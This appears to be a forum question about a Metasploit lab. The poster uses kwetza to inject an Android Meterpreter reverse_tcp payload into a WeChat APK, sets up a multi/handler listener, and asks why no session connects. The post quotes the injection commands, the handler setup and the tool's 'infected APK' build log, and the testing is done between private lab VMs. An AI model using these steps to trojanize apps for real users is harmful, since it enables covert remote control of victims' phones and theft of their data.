# Metasploit: Exploit not starting connection to handler

Tags: metasploit

I am using an Android 4.4 VirtualMachine and a Kali Linux 2018.4 VirtualMachine.

Lan Network:
Kali VM : 10.0.0.27
Android VM : 10.0.0.29

I did a .apk of the WeChat app with kwetza on Kali :

```
git clone https://github.com/sensepost/kwetza.git
mv /home/xyz/Downloads/wechat.apk to kwetza directory
python kwetza.py wechat.apk tcp 10.0.0.27 4444 yes
```

Then I uploaded the newly created wechat.apk located in wechat/dist/wechat.apk to my Android VM into /sdcard/Downloads

On Kali, I did:

```
use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp 
set LHOST 10.0.0.27 
set LPORT 4444
exploit
```

I installed the app on my Android VM and launched it

But my stdout is:

```
Started reverse TCP handler on kali_ipaddress:4444
```

And I do not have `Starting payload handler...`

Can someone help me?

ps: I have the exact same problem on a Parrot Security 4.3

```
    python kwetza.py wechat.apk tcp 10.0.0.27 4444 yes output was :

[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.0.0.27
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING TCP COMMS
[*] ANALYZING ANDROID MANIFEST
[*] USING CUSTOM ACTIVITY: AssistActivity
[*] PREPARING PAYLOADS
[*] INJECTING INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMISSIONS TO BE DONE!
[+] TIME TO BUILD INFECTED APK...
[*] EXECUTING APKTOOL BUILD COMMAND...
[+] BUILD RESULT
#####################################
I: Using Apktool 2.3.4-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes9 folder into classes9.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes6 folder into classes6.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes4 folder into classes4.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes7 folder into classes7.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes5 folder into classes5.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes8 folder into classes8.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes3 folder into classes3.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Copying raw resources...
I: Copying libs... (/lib)
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...

#####################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
#####################################
jar signed.

Warning: 
The signer's certificate is self-signed.
The MD5withRSA algorithm specified for the -sigalg option is considered a security risk.

#####################################

[+] L00t located at /root/Documents/kwetza/wechat/dist/wechat.apk
```

Comment: You might have to do a packet capture to perform some troubleshooting

Comment: With Wireshark I guess ?

Comment: that's one way - you might also be able to do it with android-specific packet capture programs

Comment: If you've found out what the problem is (it's been a few days now since you asked this question) you may want to either delete this question, or answer it with what the solution was.

Comment: Hello, I am still working on it. I'll post the solution when I find it.